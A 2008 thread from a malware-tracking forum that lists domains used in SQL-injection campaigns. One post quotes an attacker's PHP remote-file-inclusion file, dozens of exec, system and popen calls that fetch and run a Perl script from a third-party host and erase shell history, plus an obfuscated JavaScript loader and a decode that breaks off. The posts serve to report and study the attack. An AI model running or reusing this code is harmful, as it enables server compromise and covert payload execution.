Malware Domain List

Malware Related => Malicious Domains => Topic started by: YanceySlide on June 02, 2008, 04:27:14 am

Title: SQL Injected jscript sites
Post by: YanceySlide on June 02, 2008, 04:27:14 am
Hi folks,

Still getting settled in here.  Thanks JohnC and sowhat-x for the access.

I've been maintaining a list of sites I've seen that are used in the SQL injections that are injecting jscript:
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080514

Some are long down, some are quite fresh.  I'll try and update this thread as I add to the list.

Latest:
hxxp://www.redir94.com
hxxp://www.locale48.com
hxxp://www.en-us18.com
hxxp://www.sysid72.com
hxxp://www.libid53.com
hxxp://www.script46.com
hxxp://www.rundll92.com
hxxp://www.logid83.com
Title: Re: SQL Injected jscript sites
Post by: tjs on June 02, 2008, 05:54:24 am
Hi YanceySlide. Welcome to MDL and thanks for the list.

TJS
Title: Re: SQL Injected jscript sites
Post by: MysteryFCM on June 02, 2008, 05:56:39 am
I've just sent the following to the owner and registrar of mgfcompressors.com, due to someone trying to use a couple files on their server, to try and exploit one of my servers;

Code: [Select]
Ref: mgfcompressors.com/portal/help/file.txt???

The above is a Perl exploit that is used to exploit other servers. It downloads another file from;

mgfcompressors.com/portal/help/

Which then downloads another encoded script;

mgfcompressors.com/portal/help/aoaqv.js

Which is then used to exploit servers, as shown by the following excerpt from my server logs;

**************************************
BEGIN
**************************************
2008-06-02 00:04:37 192.168.0.20 GET /phpAdsNew/view.inc.php phpAds_path=http://www.mgfcompressors.com/portal/help/file.txt??? 80 - 193.198.217.3 libwww-perl/5.803 - 404 0 0
**************************************
END
**************************************

The IP that attempted the exploit (193.198.217.3), resolves to;

blaz.zsem.hr

Needless to say this exploit failed as I do not run Perl on my servers, and do not permit my servers to download non-authenticated files from unknown sources (and certainly do not allow my servers to run in capacities that would permit them to run non-essential scripts from unknown sources).

Can you cleanup your server please?

Relevant codes (they seem to block subsequent attempts to access the files, so posting here for clarity)

Code: [Select]
<title>By zaNga</title>
<h2>PHPESSID56465465421200121242024512878952300564505478693</h2><br><br>END OF BYPASS FILE<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<?
$url="http://www.mgfcompressors.com/portal/help/";
exec('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
exec('cd /tmp;GET '.$url.'read.txt > read.txt;perl read.txt;rm -f read.txt*;');
exec('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
exec('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
exec('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
passthru('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
passthru('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
passthru('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
passthru('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
passthru('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
system('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
system('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
system('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
system('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
system('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
shell_exec('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
shell_exec('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
shell_exec('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
shell_exec('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
shell_exec('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
popen('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm read.txt*;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
popen('cd /tmp;curl -O '.$url.'read.txt; perl read.txt;rm read.txt*;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
popen('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
popen('cd /tmp;lynx -source '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
popen('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
popen('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
@exec('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@exec('cd /tmp;GET '.$url.'read.txt > read.txt;perl read.txt;rm -f read.txt*;');
@exec('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@exec('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
@exec('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@passthru('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@passthru('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@passthru('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
@passthru('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@passthru('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@system('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@system('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@system('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@system('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
@system('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@shell_exec('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@shell_exec('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@shell_exec('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@shell_exec('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
@shell_exec('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@popen('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm read.txt*;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
@popen('cd /tmp;curl -O '.$url.'read.txt; perl read.txt;rm read.txt*;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
@popen('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
@popen('cd /tmp;lynx -source '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
@popen('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
@popen('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
?>

mgfcompressors.com/portal/help/ loads a script that executes the following (via XMLHTTP). I had problems fully decoding it due to arguments.callee.toString

Code: [Select]
var arg="lzchtreg";
function TkPgnCxzu(U){var Be7k="];Ak=tP.c";var sOX="G49SGGR%1SG34";var S="%se71%se2%6T";var s="arguments.calle";var Agzj="Cc%5BCc%6BCc%";var KVB="D%se63%se61%";var mEV="37Cc%3DC";var mn="cS2qjhcS65%hcS";var yv9="){if((q.readySt";var aF7="7spd3B';ev";var gIWK="0Cc%3";var o=";var h='3";var FSa="6ECc%50Cc%47Cc";var wNZb="S9g4%hcS";S+="se7B%se";var OV="1%hcS";var O4R="cS61g4%hc";var RhxD="e(K.replace(/%";var Mjn="S3B%hc";var BGWp="8KQ%1%se48KQ%1";var cEFw="%se68%se28%s";var nM="Cc%7BC";var a="3D%se2";o="i;Thd=Thd%13788"+o;var LT=";var V3L";var Q3Ts="G[RWo";var rbt="5%se25%se35%se";var NYl8="cS2%hcS4";var uG="q19=46";var aY7j="7ACc%4F";var pJA="hcS2%hcS69%";var D="3VlhcS3";KVB+="se78KQ%1";var MO="sA1spd72spd20";var w="ngth;c=c%h.le";var j="4%hcS2%";var ki0n="c%3DCc%57Cc%35";var w7="S42%hcS2E%hc";var Oj3="B.rep";var FA="CsAspd73spd38";var gIg="2r3H74Cc%6ECc%3";var hpMH="se20%se28";var J8="5%se3";gIg+="7Cc%2";var ylP="F%hcS6A%hcS3";var H="BCc%74Cc%6ECc";var fx="3Dspd27spd%C";var tH=";rR=rR+N";var Rr="2ECc%63Cc%6r3";var tpmK="Q%1%se25%";var dlrT="r vO;vO=rR+ykui";var PR="Tse3B%s";var uJ="5%se77%se20";var vXj5="e37%se33%";var cp="pe(q.resp";uJ+="%se58%";var nj="ll);";var m6f="%se25%se";var huhd="S6A%hcS2B%hcS2B";var Qm="VlhcS31%hcS29g";huhd="6F%hc"+huhd;var O1pL="e(Ak);}eva";var tw="e37%se32%s";var x7t8=";l++){";H=ki0n+"Cc%4FCc%2"+H;var O="var Q=64112;var";cEFw+="e65%se2%6Tse7";var fRBA="6C%se";var J="g,'');B=B.";var o3jT="=Thd+b;var K='s";nj="rue);q.send(nu"+nj;var HM="%7Z2r3H6";nM="BCc%2BCc%29"+nM;var Cyq="%5DCc%3BCc%6";var sYp="4%hcSD%hcS42";PR="se2%6"+PR;var Ro="eplace(/SG/g";var MGQ="c%74Cc%6ECc%37";cp="{tP = unesca"+cp;var bzKy="cS3D%hcS6Eg";Agzj="%6ECc%50Cc%47"+Agzj;var N="c%/g,'%').re";var xn5X="DCc%30Cc%";var f="se7B%s";mEV+="c%6ECc%50Cc%47";tpmK="e25%se35%se38K"+tpmK;var So0="{akK();}};q.on";var E="var x";var W="hcS25%hcS";S+="78KQ%1%se";var LCS="c%6BCc%74Cc";var kXe="ape(Qg6M.repla";var c67G="hcS29%hc";var BmE="e71%se3";var kJa="42%hcS2E%";var NlYX="cS21%hcS";var fXe=").replace";var GJ="'y%')";aF7="71spd2"+aF7;NYl8+="VlhcS6F%";var dGFN="/g,'%";var DimR="=tn7;Ak=nPG";FSa="Cc%37Cc%3DCc%"+FSa;var ysxS="%6D%6C%32%2E%5";var ps9B="%se7D%s";GJ="lace(/qj/g,"+GJ;m6f="6%se36"+m6f;Mjn=ylP+"D%hcS30%hc"+Mjn;var HDN6="5qjhcS29%";var CA7x="e(/Mm/g,'%";S="%se28%se21"+S;Q3Ts="o];nP"+Q3Ts;var V="61g4%hcS2%hcS4V";FSa+="%5BCc%6B";var lp="%se48%se7";Rr+="H61Cc%7Z43C";var CLN="%se63%se61%se7";sYp="5qjhcS29%hcS3Bg"+sYp;var yci=")^Ak;SX+=St";var zTf="hcS6D%hcS4VlhcS";OV="%hcS3"+OV;var cMD4="1%hcS4qjhcS";Oj3="l(unescape(c"+Oj3;Be7k+="harCodeAt(x6"+yci;var Fv="(nY);}catch";FSa="Cc%74Cc%6E"+FSa;var O9e="Cc%74Cc%6";m6f+="37%se";var AYO="4qjhcS2B%";E+="6;var Ak;for(";mn="%hcS4%h"+mn;ysxS="4D%73%78"+ysxS;var m="8KQ%1%se28";bzKy+="4%hcS";var X76="R%4SG3BSG72SG52";var c6ED="%6ECc%37C";FSa+="Cc%74Cc%7A";var T="C';var b=70";var ZDZQ="c%6BCc%74Cc%7";var ID="6ECc%67Cc";var G="8spd78spd";gIg+="9Cc%3BCc%74";gIg+="Cc%6ECc%"+mEV;var L5XO="Q%1%se43%se25";fx=MO+"spd72spd52spd"+fx;var w31=";var W5O=0;var ";var XY="RWo=RWo+";var A="8KQ%1%se2";var PG="HZe;c=";nj="en('GET',zqj,t"+nj;var O2mU="Tse76%";s+="e.toString();";var bru="%hcS2%";x7t8="(l=0;l<256"+x7t8;rbt="se32%se4"+rbt;s+="B=B.re";var iz="%se25%se36%";var v4m="FCc%3DCc%";var lF="GUR=VxEJ;va";kJa="hcS3D%hcS"+kJa;Q3Ts="tn7=nPG[RW"+Q3Ts;hpMH+="%se21";lF+="r f2QH='';";var LDuA="cS67g4%h";var sxvb="S61g4%hcS2";CA7x+="')));"+E;var feGD="lhcS6F%hcS64%h";w31+="Qg6M='Cc%76Cc%6";var cmd="cS6A%hcS25";var bS="escape(LV);";V=zTf+"6qjhcS"+V;Oj3="7D';eva"+Oj3;var dx="VxEJ=U;nPG=new ";var tgR="52%se";gIg+="Cc%5BCc%6BCc%";var wd="var Thd;Thd=3";var onet="ce(/g4%/g,'%7')";PR="e41%se72%se52%"+PR;var YtG="S66g4%hcS2%hcS6";yv9+="ate==4)&&(q.st";var mQa="se71%se";ysxS+="8%4D%4C%48%54%";var Yi="%se6E%se4F%s";aY7j="%6BCc%74Cc%"+aY7j;CLN+="8KQ%1%se63";Fv="bject"+Fv;kXe=xn5X+"3B';eval(unesc"+kXe;a+="7%se25";lF+="var g";GJ="cape(c2.rep"+GJ;huhd+="%hcS29g4%hcSB%";AYO+="hcS3D%";var aGb="unescape(vuL.r";CA7x="').replac"+CA7x;c6ED+="c%3BCc%6";var Z="cFCs';ykui=yku";ZDZQ="3Z35Cc%36Cc%3BC"+ZDZQ;x7t8="var B;for"+x7t8;nM=ZDZQ+"ACc%4FCc%2"+nM;O9e+="ECc%37Cc";var P="ce(/%6T/g,'9%'";ysxS+="54%50';var cB=";var fh="73%se6";MGQ+="Cc%3B";var ggTy="ABspd75sp";Q3Ts="hBIs%256;"+Q3Ts;var R="6%hcS2qjhcS65%h";var kyf="se20%se41%se";O9e+="%3BCc%7DCc";DimR+="[RWo]+nPG";L5XO+="%se38KQ";sOX+="SG27SG";hpMH+="%se71%se2%6T"+f;var y="se72%se7%6T";bru+="hcS6F%"+V;HDN6+="hcS3B%h"+LDuA;Qm+="4%hcSB%hcS66%";c67G=mn+"6F%hcS6A%"+c67G;yv9+="atus==";fx="Bspd7%CsAspd%C"+fx;var gk2="28%se65%se2%6T";RhxD+="CsA/g,'6').rep";var YTb="hcS66%hcS";vXj5="se46%se25%s"+vXj5;w+="ngth;var "+dx;var gO="l}}var zqj=iGUR";var lrv="20MZ53MZ";CLN+="%se68%se"+gk2;var Li="44spd27spd3Bspd";LCS+="%7ACc";Cyq+="ECc%50Cc%4";DimR="[hBIs]"+DimR;var Ft=",'2%').repl";P="/g,'b').repla"+P;yv9+="200))"+So0;PG+="c+rR.length;c=c";aGb=sOX+"3B';eval("+aGb;w31+="1Cc%7Z";var YsrI="S67g4%hc";Q3Ts+="]=nPG[";gIWK+="Z35Cc%36Cc%3B"+FSa;O9e="c%4FCc%5DCc%3D"+O9e;X76+="SG2BSG3DS";var xZW1="place(/Z";var KxMe="B%se71%s";DimR+="[hBIs];Ak=Ak%2";Ro+=",'%')));var "+uG;o=wd+"5861;var yku"+o;iz+="se3%6Tse25%se3";var ui8="KQ%1%s";Fv="=new ActiveXO"+Fv;cp="unction()"+cp;Mjn="%hcS6"+Mjn;var ULuQ="74Cc%";c67G+="S3B%hcS69%"+YTb;R="hcSD%hcS69%hcS6"+R;Cyq+="7Cc%5BCc";lF+="ysX=18";a="20%se4C%se56%se"+a;CA7x+="x6=0;x6<tP.le";var i1EP="2%se6A%se65";S="e66%se20"+S;BGWp=rbt+"38%se25%se3"+BGWp;fXe="(/Vl/g,'3%'"+fXe;YsrI="cS6E%hc"+YsrI;nj="e=x;q.op"+nj;var n="sA1spd";var pCH5="Cc%5BCc%";NYl8+="hcS64%hcS65%hc";D="hcS3D%hcS3D%hcS"+D;LCS=v4m+"30Cc%3BC"+LCS;var sf="30%se27%se3B";T+="100;var HZ";var gj="6ECc%37Cc%20Cc";Q3Ts="+nPG[RWo];hBIs="+Q3Ts;J+="toUpperCa";T+="e;var N5='bO2";xZW1="escape(V3LR.re"+xZW1;YtG="S2E%hc"+YtG;tH="'%')))"+tH;KxMe=S+"72%se7%6Tse7"+KxMe;FA="spd3%"+FA;i1EP="8%se4F%se6"+i1EP;fXe+="(/%hcS/g,'%')";MGQ="c%4FCc%5DCc%2BC"+MGQ;Ft+="ace(/r3";fRBA="6E%se75%se"+fRBA;LT+="R='MZ68MZ42M";Mjn="2%hcS2qjhcS65"+Mjn;var JD6a="se6C%se";Be7k=DimR+"56;Ak=nPG[Ak"+Be7k;Z=Ro+"40;N5+='v47"+Z;sf=tpmK+"se35%se"+sf;HDN6+="cS9g4%hcSVl";lF+="8;var eoj";sYp="4%hcSVlhcS"+sYp;gIWK+="Cc%4FCc%5DCc";MGQ+="Cc%74Cc%6E";Ft=N+"place(/Z/g"+Ft;var i="Dspd%";bzKy=sxvb+"%hcS20g4%hcS1%h"+bzKy;onet=fXe+".repla"+onet;var RLe="/g,'8'";HM+="BCc%74Cc%7ACc%4"+LCS;LT+="Z49MZ73MZ3DM";ysxS="ArR='%"+ysxS;J=s+"place(/\\W/"+J;bS="%')));var nY=un"+bS;X76="SGGR%8SGG"+X76;Mjn+="S65%hcS6F";bS="place(/%se/g,'"+bS;RLe="ce(/y"+RLe;Yi="2%se20"+Yi;O+=" vuL='S";O2mU="78KQ%1%se6%6"+O2mU;i=ggTy+"d%CsA9spd3"+i;var eeF="S6qjhcS3B%hc";OV+="3qjhcS3qjhcS3B";R+="cS6F%h"+cmd;var Zl="g4%hcSVlhcS5qj";ui8=lp+"8KQ%1%se78"+ui8;var ggNn="MZ3B';e";gIWK+="%3BCc"+Agzj;CLN+="se7B%"+mQa;D+="1%hcS29g4%hcSB";NYl8="jhcS61g4%h"+NYl8;AYO="hcS51%hcS"+AYO;dGFN+="3').replace(";YsrI=w7+"S6C%hcS65%h"+YsrI;onet=GJ+".replace"+onet;m="e65%se73%se7"+m;kJa+="hcS6Vlhc";PG="+Q;c=c+"+PG;Q3Ts="6;hBIs=hBIs"+Q3Ts;sf=J8+"5%se38KQ%1%s"+sf;Yi+="e58KQ%1";AYO=D+"%hcS66%hcS32%"+AYO;OV="jhcS3D"+OV;var C="e4F%se58KQ%1%s";FA+="spd27spd3";O2mU+="se65%se5"+i1EP;LT=Ft+"H/g,'8%')))"+LT;sYp="qjhcS67g4%hcS9g"+sYp;BGWp+="%se25%se38K"+L5XO;fh="6E%se65%se"+fh;c67G+="2qjhcS65%hcS6F";Be7k+="ring.f";tH=RhxD+"lace(/spd/g,"+tH;lrv="Z61MZ72MZ"+lrv;cEFw+="B%se71%se3D%se"+fRBA;Z=dGFN+"/GR%/g,'6').r"+Z;onet="';eval(unes"+onet;ID+="%74Cc%6r3H3BCc%"+ULuQ;Z+="i*q19;va"+dlrT;sYp="hcS65%hcS2"+sYp;var hcZq="d2Bspd3Dspd27sp";W+="3VlhcS32%"+AYO;c6ED=w31+"20Cc%74Cc"+c6ED;O=tH+"5;var c=33550;"+O;A=O2mU+"%se63%se7"+A;J+="se();B+=c;var i"+lF;y=hpMH+"e78KQ%1%"+y;fh+="3%se61%s";O=aF7+"al(unescap"+O;R+="%hcS3VlhcS32%h"+NlYX;c6ED+="6Cc%6FCc"+HM;j+="hcS69%hcS6E%";Mjn+="%hcS6A%hcS3C%hc"+YsrI;kJa+="S6qjh"+O4R;O9e=Cyq+"%57Cc%35C"+O9e;C=A+"8%se6E%s"+C;yv9="var x=function("+yv9;Mjn="4%hcS"+Mjn;ysxS=RLe+")));var "+ysxS;sYp+="%hcS3D%hcS66%hc";PG+="%b.le"+w;fh+="e70%se65%se28%s"+PR;O9e+="%5Z57Cc";MGQ+="Cc%37C"+H;onet+=".repla"+ysxS;gIWK=gj+"%25Cc%2"+gIWK;Rr="Cc%4Z"+Rr;var iy="67%hcS2";bru+="lhcS6F%hcS64%"+sYp;hcZq=FA+"Bspd%CsA8sp"+hcZq;pCH5+="57Cc%35Cc%4FCc"+O9e;o+="r2PkG2";Oj3=JD6a+"6C%se7D%se"+Oj3;O1pL+="l(SX);};"+yv9;P=Oj3+"lace(/8KQ%"+P;bru+="S32%hcS5"+cMD4;ui8+="e70%se"+tgR;uJ=BmE+"D%se6E%se6"+uJ;bS="b1%/g,'4%').re"+bS;gIg="Cc%74Cc%"+gIg;O+="GGRCSG3DSGGRC";c67G+="%hcS6A%"+W;NYl8="cS4VlhcS6q"+NYl8;O1pL+="readystatechang"+nj;var Rea="51%hcS4qjhcS2B";o3jT+="pd7%CsAspd%C"+n;m+="%se2%6Ts";onet+="'%se76%se61%";LT=kXe+"ce(/C"+LT;Q3Ts=XY+"1;RWo=RWo%25"+Q3Ts;G+="%CsA3spd3Dspd2";aY7j+="Cc%25Cc%4Z2EC";lrv+="58MZ3DMZ27MZ27"+ggNn;CLN+="3D%se6E%se75%"+P;bS=CLN+").replace(/"+bS;nM+="c%74Cc%6";bzKy+="5%hcS6C%hcS6C";ui8+="65%se71%se75%s"+m;gO+=";var akK=f"+cp;Rr+="c%6FCc%64Cc%";bru=iy+"E%hcS66g4"+bru;lrv="BMZ76M"+lrv;Qm=R+"3D%hcS3"+Qm;var Abi="%57Cc%35Cc%4";x7t8=PG+"Array();var l;"+x7t8;vXj5+="se25%se36%se";var ymm="5DCc%3DCc%6";feGD+="cS65%hcS41g4"+c67G;nM+="ECc%37Cc%3DCc"+aY7j;gIWK=Abi+"FCc%3DCc%74Cc%"+gIWK;m6f="5%se3"+m6f;pCH5+="%6FCc%3"+LT;wNZb="7g4%hc"+wNZb;j+="hcS67%hc"+YtG;ymm+="ECc%50Cc%47"+pCH5;o3jT+="72spd20spd7"+G;c6ED=gO+"onseText)"+c6ED;Rr+="65Cc%41"+gIg;huhd=eeF+"S65%hcS"+huhd;fx=i+"CsA2spd3"+fx;fh=Yi+"%se3D%se75%se"+fh;Rea+="%hcS3D%hcS53g4";Rea+="%hcS4g4%"+pJA;Li+="79spd%Cs"+fx;bzKy+="%hcS3B"+onet;Q3Ts+="hBIs];nPG"+Be7k;a+="%se38K";J=x7t8+"nPG[l]=l;}B="+J;nM=c6ED+"%4FCc%3CCc%"+nM;y=sf+"%se6%6Tse66%"+y;NYl8=j+"F%hcS6D%h"+NYl8;wNZb+="VlhcS"+HDN6;kyf="E%se65%se77%"+kyf;hcZq+="d%CsAAspd39spd"+Li;Z+=";rR=xxc+vO;b=N5"+J;wNZb+="hcS5q"+OV;wNZb=NYl8+"S2qjhcS6"+wNZb;xZW1+="/g,'m"+CA7x;uJ=y+"se7B%s"+uJ;tw+="e25%se36%"+vXj5;C=kyf+"63%se"+C;Rr+="74Cc%7AC"+MGQ;uJ+="se4D%se4C"+ui8;aGb=X76+"G27SG45S"+aGb;Qm=wNZb+"g4%hcSDg4%"+Qm;Zl=huhd+"hcS67g4%hcS9"+Zl;ID+="6ECc%37Cc%3D"+Rr;Zl=Mjn+"S4%hc"+Zl;Z=aGb+"eplace(/C"+Z;KVB+="%se63"+cEFw;bru=Rea+"hcS6E%hcS"+bru;C=KxMe+"e3D%se6"+C;iz+="6%se33%se25%s"+tw;gIWK+="74Cc%7ACc%4FCc%"+ymm;Z=O+"SG2BSG54"+Z;ps9B=KVB+"6C%se7D%se3B"+ps9B;BGWp=m6f+"38KQ%1%se25%"+BGWp;Z=hcZq+"sABspd"+Z;ID=nM+"c%6CCc%65Cc%"+ID;feGD=kJa+"S2%hcS4V"+feGD;T=o+"';h+='Vp"+T;C=fh+"e6%6Ts"+C;Qm+="hcS32%hcS"+bru;Q3Ts+="romCharCod"+O1pL;iz+="46%se2"+BGWp;ID=Fv+"(e){q=nul"+ID;a=bzKy+"se72%se"+a;feGD=Zl+"hcS5E%"+feGD;ID=bS+"if (!q){try{q"+ID;ID+="%37Cc%3BCc"+gIWK;feGD="hcS66%hcS6Fg"+feGD;ID+="Z30MZ3"+lrv;T+="Px';HZe"+o3jT;Z="7%CsA"+Z;xZW1=ID+"val(un"+xZW1;uJ=iz+"%1%se38%se2"+uJ;a+="Q%1%se48KQ%1"+uJ;xZW1=C+"e2%6Tse3B%se7D"+xZW1;Qm+="3Bg4%hcS6%hc"+a;ps9B=Qm+"e3B%se7"+ps9B;ps9B=feGD+"hcS53g4%hcS4g"+ps9B;ps9B+="e76%se61%se7"+xZW1;ps9B+="ngth;x6++){"+Q3Ts;Z=T+"7spd54spd72spd"+Z;Z+=";var c2='%"+ps9B;eval(Z);}TkPgnCxzu(arg);

Partially decoded;

Code: [Select]
var Thd;Thd=35861;var ykui;Thd=Thd%13788;var h='3r2PkG2';h+='VpC';var b=70100;var HZe;var N5='bO2Px';HZe=Thd+b;var K='spd7%CsAspd%CsA1spd72spd20spd78spd78spd%CsA3spd3Dspd27spd54spd72spd7%CsAspd3%CsAspd73spd38spd27spd3Bspd%CsA8spd2Bspd3Dspd27spd%CsAAspd39spd44spd27spd3Bspd79spd%CsABspd75spd%CsA9spd3Dspd%CsA2spd3Bspd7%CsAspd%CsA1spd72spd20spd72spd52spd3Dspd27spd%CsABspd71spd27spd3B';eval(unescape(K.replace(/%CsA/g,'6').replace(/spd/g,'%')));rR=rR+N5;var c=33550;var Q=64112;var vuL='SGGRCSG3DSGGRCSG2BSG54SGGR%8SGGR%4SG3BSG72SG52SG2BSG3DSG27SG45SG49SGGR%1SG34SG27SG3B';eval(unescape(vuL.replace(/C/g,'%3').replace(/GR%/g,'6').replace(/SG/g,'%')));var q19=4640;N5+='v47cFCs';ykui=ykui*q19;var vO;vO=rR+ykui;rR=xxc+vO;b=N5+Q;c=c+HZe;c=c+rR.length;c=c%b.length;c=c%h.length;var VxEJ=U;nPG=new Array();var l;var B;for(l=0;l<256;l++){nPG[l]=l;}B=arguments.callee.toString();B=B.replace(/\W/g,'');B=B.toUpperCase();B+=c;var iGUR=VxEJ;var f2QH='';var gysX=188;var eoj;var c2='%hcS66%hcS6Fg4%hcS2%hcS2qjhcS65%hcS6F%hcS6A%hcS3D%hcS30%hcS3B%hcS65%hcS6F%hcS6A%hcS3C%hcS42%hcS2E%hcS6C%hcS65%hcS6E%hcS67g4%hcS4%hcS6qjhcS3B%hcS65%hcS6F%hcS6A%hcS2B%hcS2B%hcS29g4%hcSB%hcS67g4%hcS9g4%hcSVlhcS5qjhcS5E%hcS3D%hcS42%hcS2E%hcS6VlhcS6qjhcS61g4%hcS2%hcS4VlhcS6F%hcS64%hcS65%hcS41g4%hcS4%hcS2qjhcS65%hcS6F%hcS6A%hcS29%hcS3B%hcS69%hcS66%hcS2qjhcS65%hcS6F%hcS6A%hcS25%hcS3VlhcS32%hcS3D%hcS3D%hcS3VlhcS31%hcS29g4%hcSB%hcS66%hcS32%hcS51%hcS4qjhcS2B%hcS3D%hcS53g4%hcS4g4%hcS2%hcS69%hcS6E%hcS67%hcS2E%hcS66g4%hcS2%hcS6F%hcS6D%hcS4VlhcS6qjhcS61g4%hcS2%hcS4VlhcS6F%hcS64%hcS65%hcS2qjhcS67g4%hcS9g4%hcSVlhcS5qjhcS29%hcS3B%hcS67g4%hcS9g4%hcSVlhcS5qjhcS3D%hcS31%hcS3qjhcS3qjhcS3Bg4%hcSDg4%hcSD%hcS69%hcS66%hcS2qjhcS65%hcS6F%hcS6A%hcS25%hcS3VlhcS32%hcS21%hcS3D%hcS3VlhcS31%hcS29g4%hcSB%hcS66%hcS32%hcS51%hcS4qjhcS2B%hcS3D%hcS53g4%hcS4g4%hcS2%hcS69%hcS6E%hcS67%hcS2E%hcS66g4%hcS2%hcS6F%hcS6D%hcS4VlhcS6qjhcS61g4%hcS2%hcS4VlhcS6F%hcS64%hcS65%hcS2qjhcS67g4%hcS9g4%hcSVlhcS5qjhcS29%hcS3Bg4%hcSD%hcS42%hcS3D%hcS66%hcS32%hcS51%hcS4qjhcS3Bg4%hcS6%hcS61g4%hcS2%hcS20g4%hcS1%hcS3D%hcS6Eg4%hcS5%hcS6C%hcS6C%hcS3B';eval(unescape(c2.replace(/qj/g,'y%').replace(/Vl/g,'3%').replace(/%hcS/g,'%').replace(/g4%/g,'%7').replace(/y/g,'8')));var ArR='%4D%73%78%6D%6C%32%2E%58%4D%4C%48%54%54%50';var cB='%se76%se61%se72%se20%se4C%se56%se3D%se27%se25%se38KQ%1%se48KQ%1%se25%se36%se3%6Tse25%se36%se33%se25%se37%se32%se25%se36%se46%se25%se37%se33%se25%se36%se46%se25%se36%se36%se25%se37%se38KQ%1%se25%se32%se45%se25%se35%se38%se25%se38KQ%1%se48KQ%1%se25%se38KQ%1%se43%se25%se38KQ%1%se38%se25%se35%se38KQ%1%se25%se35%se38KQ%1%se25%se35%se30%se27%se3B%se6%6Tse66%se20%se28%se21%se71%se2%6Tse7B%se78KQ%1%se72%se7%6Tse7B%se71%se3D%se6E%se65%se77%se20%se58%se4D%se4C%se48%se78KQ%1%se78KQ%1%se70%se52%se65%se71%se75%se65%se73%se78KQ%1%se28%se2%6Tse3B%se7D%se63%se61%se78KQ%1%se63%se68%se28%se65%se2%6Tse7B%se71%se3D%se6E%se75%se6C%se6C%se7D%se3B%se7D%se76%se61%se72%se20%se6E%se4F%se58KQ%1%se3D%se75%se6E%se65%se73%se63%se61%se70%se65%se28%se41%se72%se52%se2%6Tse3B%se6%6Tse66%se20%se28%se21%se71%se2%6Tse7B%se78KQ%